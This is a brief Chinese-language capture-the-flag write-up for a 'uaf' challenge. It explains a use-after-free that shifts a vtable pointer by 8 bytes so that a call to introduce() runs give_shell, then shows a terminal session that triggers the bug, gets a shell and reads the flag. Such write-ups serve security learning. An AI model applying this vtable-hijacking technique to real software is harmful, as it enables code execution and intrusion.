- 程序通过指向vtable的指针+8来调用introduce()函数,所以我们可以通过uaf来更改原本指向vtable的指针为vtable-8处,这样当执行vtable+8时就会执行give_shell函数
payload:
uaf@ubuntu:/tmp/hacker_mao$ ./uaf 16 file
1. use
2. after
3. free
3
1. use
2. after
3. free
2
your data is allocated
1. use
2. after
3. free
2
your data is allocated
1. use
2. after
3. free
1
$ cat /home/uaf/flag
yay_f1ag_aft3r_pwning
$
